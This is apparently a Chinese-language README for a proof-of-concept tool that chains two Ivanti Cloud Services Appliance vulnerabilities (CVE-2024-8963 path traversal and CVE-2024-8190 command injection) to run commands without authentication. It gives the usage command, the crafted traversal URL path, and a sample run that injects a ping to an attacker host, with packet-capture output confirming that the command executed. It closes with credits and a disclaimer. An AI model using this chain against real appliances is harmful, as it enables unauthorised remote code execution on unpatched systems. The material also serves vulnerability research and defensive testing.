结合 CVE-2024-8963 和 CVE-2024-8190——针对 Ivanti CSA 4.6 及以下版本的未认证远程代码执行 PoC。
CVE-2024-8963
Ivanti CSA 4.6 Patch 519 之前版本中的路径遍历漏洞,允许远程未认证攻击者访问受限功能。
CVE-2024-8190
Ivanti Cloud Services Appliance 4.6 Patch 518 及之前版本中的 OS 命令注入漏洞,允许远程认证攻击者获得远程代码执行能力。攻击者必须拥有管理员权限才能利用此漏洞。
本 PoC 将两者结合,演示如何以未认证方式利用 CVE-2024-8190。
python3 ./cve-2024-8190.py <target_url> '<CMD>'
$ python3 ./cve-2024-8190.py https://<target> 'ping -c 4 <attacker>'
[!] 警告:此脚本仅用于授权的测试和教育目的。未经授权使用是违法的。
[*] 正在获取 https://<target>/client/index.php%3F.php/gsb/datetime.php...
[+] 获取到 LDCSA_CSRF 值:sid:483045<已移除>
[*] 正在发送 payload...
[!] 请求超时。请检查命令是否在目标上执行。
$ sudo tcpdump -n "icmp" -l
11:43:15.135004 IP <target> > <attacker> ICMP echo request, id 30001, seq 1, length 64
11:43:16.135647 IP <target> > <attacker>: ICMP echo request, id 30001, seq 2, length 64
11:43:17.137707 IP <target> > <attacker>: ICMP echo request, id 30001, seq 3, length 64
11:43:18.137085 IP <target> > <attacker>: ICMP echo request, id 30001, seq 4, length 64
Horizon3.ai 的 CVE-2024-8190 PoC,本工作大量基于此:
https://github.com/horizon3ai/CVE-2024-8190
ProjectDiscovery 的 CVE-2024-8963.yaml nuclei 模板:
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-8963.yaml
P.S. ProjectDiscovery 太棒了!
别当混蛋。
本软件纯粹出于学术研究和开发有效防御技术的目的而创建,并非用于攻击系统,除非得到明确授权。项目维护者不对软件的滥用负责。请负责任地使用。